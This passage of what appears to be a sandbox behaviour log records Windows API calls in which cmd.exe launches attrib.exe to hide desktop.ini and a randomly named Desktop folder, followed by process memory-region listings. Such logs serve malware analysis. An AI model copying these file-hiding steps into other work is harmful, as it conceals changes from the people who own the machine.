lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.779] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.779] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.779] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.779] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.779] ReadFile (in: hFile=0x58, 
lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.779] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.779] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.780] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.780] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.780] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.780] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.780] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.780] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.780] ReadFile 
(in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.780] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.780] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.781] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.781] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.781] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.781] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.781] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.781] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 
[0227.781] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.812] FindClose (in: hFindFile=0x2de6a8 | out: hFindFile=0x2de6a8) returned 1 [0227.812] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0227.813] _close (_FileHandle=3) returned 0 [0227.813] GetConsoleTitleW (in: lpConsoleTitle=0x26f328, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.813] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0227.813] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0227.813] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0227.814] FindClose (in: hFindFile=0x2de6a8 | out: hFindFile=0x2de6a8) returned 1 [0227.814] FindClose (in: hFindFile=0x2de6a8 | out: hFindFile=0x2de6a8) returned 1 [0227.814] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0227.814] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0227.814] GetConsoleTitleW (in: lpConsoleTitle=0x26f0bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.815] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ef44, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f00c | out: lpAttributeList=0x26ef44, lpSize=0x26f00c) returned 1 [0227.815] UpdateProcThreadAttribute (in: lpAttributeList=0x26ef44, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f004, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ef44, lpPreviousValue=0x0) returned 1 [0227.815] GetStartupInfoW (in: lpStartupInfo=0x26ef00 | out: lpStartupInfo=0x26ef00*(cb=0x44, 
lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0227.815] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0227.815] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26efa0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26efec | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" ", lpProcessInformation=0x26efec*(hProcess=0x4c, hThread=0x50, dwProcessId=0xed8, dwThreadId=0x8b4)) returned 1 [0227.817] CloseHandle (hObject=0x50) returned 1 [0227.817] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0227.817] GetEnvironmentStringsW () returned 0x2e2dc0* [0227.817] FreeEnvironmentStringsW (penv=0x2e2dc0) returned 1 [0227.817] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0228.036] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x26eee0 | out: lpExitCode=0x26eee0*=0x0) returned 1 [0228.036] CloseHandle (hObject=0x4c) returned 1 [0228.036] _vsnwprintf (in: _Buffer=0x26f028, _BufferCount=0x13, _Format="%08X", _ArgList=0x26eeec | out: _Buffer="00000000") returned 8 [0228.036] 
SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0228.036] GetEnvironmentStringsW () returned 0x2e2dc0* [0228.036] FreeEnvironmentStringsW (penv=0x2e2dc0) returned 1 [0228.036] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0228.036] GetEnvironmentStringsW () returned 0x2e2dc0* [0228.036] FreeEnvironmentStringsW (penv=0x2e2dc0) returned 1 [0228.036] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ef44 | out: lpAttributeList=0x26ef44) [0228.037] GetConsoleTitleW (in: lpConsoleTitle=0x26f328, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0228.037] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0228.037] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0228.037] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0228.037] FindClose (in: hFindFile=0x2de6a8 | out: hFindFile=0x2de6a8) returned 1 [0228.037] FindClose (in: hFindFile=0x2de6a8 | out: hFindFile=0x2de6a8) returned 1 [0228.037] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0228.037] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0228.037] GetConsoleTitleW (in: lpConsoleTitle=0x26f0bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0228.038] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ef44, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f00c | out: lpAttributeList=0x26ef44, lpSize=0x26f00c) returned 1 [0228.038] UpdateProcThreadAttribute (in: lpAttributeList=0x26ef44, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f004, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ef44, lpPreviousValue=0x0) returned 1 [0228.038] 
GetStartupInfoW (in: lpStartupInfo=0x26ef00 | out: lpStartupInfo=0x26ef00*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0228.038] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0228.038] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26efa0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26efec | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\"", lpProcessInformation=0x26efec*(hProcess=0x50, hThread=0x4c, dwProcessId=0x8a0, dwThreadId=0x7dc)) returned 1 [0228.039] CloseHandle (hObject=0x4c) returned 1 [0228.039] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0228.039] GetEnvironmentStringsW () returned 0x2e37f8* [0228.040] FreeEnvironmentStringsW (penv=0x2e37f8) returned 1 [0228.040] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0228.280] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26eee0 | out: lpExitCode=0x26eee0*=0x0) returned 1 [0228.280] CloseHandle (hObject=0x50) returned 1 [0228.280] _vsnwprintf (in: _Buffer=0x26f028, _BufferCount=0x13, _Format="%08X", _ArgList=0x26eeec | out: 
_Buffer="00000000") returned 8 [0228.280] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0228.280] GetEnvironmentStringsW () returned 0x2e37f8* [0228.280] FreeEnvironmentStringsW (penv=0x2e37f8) returned 1 [0228.280] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0228.281] GetEnvironmentStringsW () returned 0x2e37f8* [0228.281] FreeEnvironmentStringsW (penv=0x2e37f8) returned 1 [0228.281] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ef44 | out: lpAttributeList=0x26ef44) [0228.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.281] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0228.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.281] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4f41ac | out: lpMode=0x4a4f41ac) returned 1 [0228.281] _get_osfhandle (_FileHandle=0) returned 0x3 [0228.281] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4f41b0 | out: lpMode=0x4a4f41b0) returned 1 [0228.281] SetConsoleInputExeNameW () returned 0x1 [0228.281] GetConsoleOutputCP () returned 0x1b5 [0228.281] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4f4260 | out: lpCPInfo=0x4a4f4260) returned 1 [0228.281] SetThreadUILanguage (LangId=0x0) returned 0x409 [0228.281] exit (_Code=0) Process: id = "604" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166c0" os_pid = "0xf28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "603" os_parent_pid = "0xea8" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon 
Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34239 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34240 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34241 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34242 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 34243 start_va = 0xea0000 end_va = 0xea6fff entry_point = 0xea0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 34244 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34245 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34246 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34247 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 34248 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34252 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename 
= "" Region: id = 34253 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34254 start_va = 0x60000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 34255 start_va = 0x160000 end_va = 0x1c6fff entry_point = 0x160000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34256 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 34257 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 34258 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34259 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 34260 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34261 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34262 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" 
(normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 34263 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34264 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34265 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34266 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 34267 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34268 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34269 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 34270 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34271 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 841 os_tid = 0xf4c Process: id = "605" 
image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166c0" os_pid = "0xed8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "603" os_parent_pid = "0xea8" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34273 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34274 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34275 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34276 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 34277 start_va = 0x7f0000 end_va = 0x7f6fff entry_point = 0x7f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 34278 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34279 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = 
"\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34280 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34281 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 34282 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34283 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34284 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34285 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34286 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 34287 start_va = 0x410000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 34288 start_va = 0x6f020000 end_va = 0x6f03cfff entry_point = 0x6f020000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 34289 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34290 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = 
"\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 34291 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34292 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34293 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 34294 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34295 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34296 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: 